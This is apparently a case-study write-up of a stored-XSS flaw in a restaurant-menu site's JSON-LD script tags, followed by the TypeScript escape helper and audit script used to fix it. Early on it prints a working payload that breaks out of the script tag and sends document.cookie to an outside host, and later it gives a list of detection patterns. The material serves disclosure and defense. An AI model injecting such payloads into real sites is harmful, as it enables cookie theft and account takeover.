Cansu (@cansubits), 32, a freelance SEO consultant and part-time bug bounty hunter in Sahinbey, Gaziantep, is running an SEO audit for a fourth-generation baklava shop client. Chrome DevTools Console and Network tabs are open. She navigates to thmenu.com/tr/discover/<baklavaci_slug>. Console: **Uncaught SyntaxError: Unexpected token "<"**. The JSON-LD is broken. View Source: unescaped `&` and `<` characters inside `<script type="application/ld+json">`. "No HTML escaping at all? This could be a stored-XSS sink."

She adds a new Test Restaurant in her own thMenu Pro test account, with the Description field set to: `Lorem ipsum </script><script>fetch("//cansubits.com/xss?c="+document.cookie)</script> dolor sit amet.` Save, wait 5-10 minutes for the edge cache, then navigate to thmenu.com/tr/discover/test-restaurant. The browser makes a call to the cansubits.com/xss?c=... endpoint: **document.cookie was exfiltrated**. Stored XSS confirmed. Cansu responsibly discloses to security@thmenu.com.

Engineering forensics: did a helper already exist? Yes: apps/web-menu/src/lib/sanitize.ts:escapeJsonForScriptTag() shipped in PR #565, batch TT F1. It rewrites the characters `<`, `>`, `&`, U+2028 and U+2029 into their `\uXXXX` JSON-escape form; it wraps 11 sites in the web-menu app. Why is it not used in web-landing? `grep -rn "dangerouslySetInnerHTML.*JSON.stringify" apps/web-landing` → 8 results (discover, blog, vs, authors, faq, help, layout, synaltix). All of them raw JSON.stringify, no escapeJsonForScriptTag. The helper sweep was incomplete. PR #565 was applied only to web-menu (because web-menu uses a CSP with nonce-..., while web-landing uses "unsafe-inline" for SEO crawler compatibility; so web-landing has no CSP-level defense and the escape helper is MANDATORY there).

**PR #635 batch III F1**, a two-layer fix. **Layer 1, new helper file**: apps/web-landing/src/lib/sanitize.ts, a mirror of the web-menu helper; the U+2028/U+2029 regex patterns are written in `\uXXXX` form (a raw U+2028/U+2029 literal is a line terminator, and the TS parser would split the source line at it). **Layer 2, wrap the 8 JSON-LD render sites**: `dangerouslySetInnerHTML={{ __html: escapeJsonForScriptTag(JSON.stringify(schema)) }}` at each site.
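The escape step described above, as an added example written for this page (it is not thMenu's sanitize.ts, and the function and sample schema names are assumptions). It shows the same idea the helper implements: rewrite `<`, `>`, `&`, U+2028 and U+2029 to `\uXXXX` escapes, which the JSON grammar accepts, so the HTML parser never sees a `</script>` while `JSON.parse` still returns the original object. `renderJsonLd(schema, false)` reproduces the raw `JSON.stringify` sink and `scriptTagBreakout` is the check a test or crawler can run over the rendered HTML.

```typescript
// Added example (not thMenu's code): escaping a JSON-LD <script> body.
// The map is written with \uXXXX escapes in the source so that no raw
// U+2028/U+2029 (line terminators for the TS/JS parser) appears in this file.
const JSON_SCRIPT_ESCAPES: Record<string, string> = {
  "<": "\\u003c",
  ">": "\\u003e",
  "&": "\\u0026",
  "\u2028": "\\u2028",
  "\u2029": "\\u2029",
};

// Rewrites the dangerous characters inside an already-serialized JSON string.
// The output is still valid JSON, so JSON.parse yields the same object.
function escapeJsonForScriptTag(json: string): string {
  return json.replace(/[<>&\u2028\u2029]/g, (ch) => JSON_SCRIPT_ESCAPES[ch] ?? ch);
}

// Server-side render of a JSON-LD block. escape === false reproduces the
// unprotected raw JSON.stringify sink; escape === true is the hardened form.
function renderJsonLd(schema: unknown, escape: boolean): string {
  const json = JSON.stringify(schema);
  const body = escape ? escapeJsonForScriptTag(json) : json;
  return `<script type="application/ld+json">${body}</script>`;
}

// Detection check: a well-formed JSON-LD block contains exactly one </script>.
// Any other count means attacker-controlled data closed the script element.
function scriptTagBreakout(html: string): boolean {
  const closers = html.match(/<\/script\s*>/gi) ?? [];
  return closers.length !== 1;
}

// Constructed sample (assumption): a description carrying a closing tag, an
// ampersand and a U+2028 so every escape in the map is exercised.
const SAMPLE_SCHEMA = {
  "@context": "https://schema.org",
  "@type": "Restaurant",
  name: "Test Restaurant",
  description: "Lorem ipsum </script><script>/* injected */</script> dolor & sit\u2028amet.",
};

console.log("raw breakout:", scriptTagBreakout(renderJsonLd(SAMPLE_SCHEMA, false)));   // true
console.log("safe breakout:", scriptTagBreakout(renderJsonLd(SAMPLE_SCHEMA, true)));   // false
```

The escape is applied after `JSON.stringify`, never to the object's fields, so it covers every string the serializer emits (keys included) and cannot be bypassed by a field the schema builder forgot to sanitize.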
Deployed the same day. Cansu's PoC payload is re-tested: in `</script><script>fetch(...)</script>` the `<` and `>` are now emitted as `\u003c` and `\u003e`, so a script-tag breakout in the browser is impossible. Pre-fix audit over 90 days of edge cache plus Workers Analytics, grepping for `document.cookie`, `</script><script>`, cross-origin `fetch` and `eval`: **0 prior exploits**. Cansu was the first, and she disclosed responsibly. **Critical severity + €750 Wise transfer + Hall of Fame + 1-year unlimited Pro tier**. In the Hannah (Berlin Mitte) version, the same flow runs as an SEO audit for a Berlin bakery client.

Pattern: **once defense-in-depth helpers (escape, sanitize, normalize) have shipped in one app, a sweep across the other apps in the monorepo is required. Apps without the helper create unexpected attack surface, especially when the CSP single-point-of-defense control is not active in that app.**

Implementation checklist: (1) when a new helper PR lands, sweep ALL apps in the monorepo; (2) put the helper in packages/shared-types as the single source of truth; (3) if CSP profiles differ between apps, apps with a looser CSP must treat the helper as MANDATORY; (4) ESLint rule: lint warning on the `dangerouslySetInnerHTML.*JSON.stringify` pattern; (5) quarterly grep audit; (6) penetration test coverage: test every public CDN-served page with an XSS payload.
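Checklist items (4) and (5) as a small source audit, added here as an example and not thMenu's tooling. It scans file contents for a `dangerouslySetInnerHTML` sink that is fed `JSON.stringify(...)` without `escapeJsonForScriptTag(...)` within a few lines, which is the same pattern the page's `grep -rn` found; the file paths and source snippets below are constructed, not the repository's layout.

```typescript
// Added example (not thMenu's tooling): report JSON-LD sinks that bypass the helper.
interface Finding {
  file: string;
  line: number; // 1-based line of the dangerouslySetInnerHTML prop
  text: string;
}

const SINK = /dangerouslySetInnerHTML/;
const RAW_JSON = /JSON\.stringify\(/;
const ESCAPE_HELPER = /escapeJsonForScriptTag\(/;

// A JSX prop may span several lines, so `lookahead` lines after the sink are
// included when checking for the JSON.stringify call and the wrapping helper.
function findUnescapedJsonLdSinks(file: string, source: string, lookahead = 2): Finding[] {
  const lines = source.split("\n");
  const findings: Finding[] = [];
  for (let i = 0; i < lines.length; i++) {
    const line = lines[i] ?? "";
    if (!SINK.test(line)) continue;
    const window = lines.slice(i, i + lookahead + 1).join("\n");
    if (RAW_JSON.test(window) && !ESCAPE_HELPER.test(window)) {
      findings.push({ file, line: i + 1, text: line.trim() });
    }
  }
  return findings;
}

function auditAll(files: Record<string, string>): Finding[] {
  const out: Finding[] = [];
  for (const [file, src] of Object.entries(files)) {
    out.push(...findUnescapedJsonLdSinks(file, src));
  }
  return out;
}

// Constructed sources (assumption): one raw sink that must be flagged, one
// single-line wrapped sink and one multi-line wrapped sink that are clean.
const SAMPLE_FILES: Record<string, string> = {
  "web-landing/discover.tsx": [
    "export default function Page({ schema }: Props) {",
    '  return <script type="application/ld+json"',
    "    dangerouslySetInnerHTML={{ __html: JSON.stringify(schema) }} />;",
    "}",
  ].join("\n"),
  "web-menu/menu.tsx": [
    '  <script type="application/ld+json"',
    "    dangerouslySetInnerHTML={{ __html: escapeJsonForScriptTag(JSON.stringify(schema)) }} />",
  ].join("\n"),
  "web-landing/faq.tsx": [
    '  <script type="application/ld+json" dangerouslySetInnerHTML={{',
    "    __html: escapeJsonForScriptTag(",
    "      JSON.stringify(faqSchema)),",
    "  }} />",
  ].join("\n"),
};

for (const f of auditAll(SAMPLE_FILES)) {
  console.log(`${f.file}:${f.line}: ${f.text}`); // only web-landing/discover.tsx:3 is reported
}
```

Run over a real checkout by feeding each `.tsx` file's text to `findUnescapedJsonLdSinks`; a non-empty result fails the quarterly audit or the lint step, and the same regexes translate directly into a custom ESLint rule for item (4).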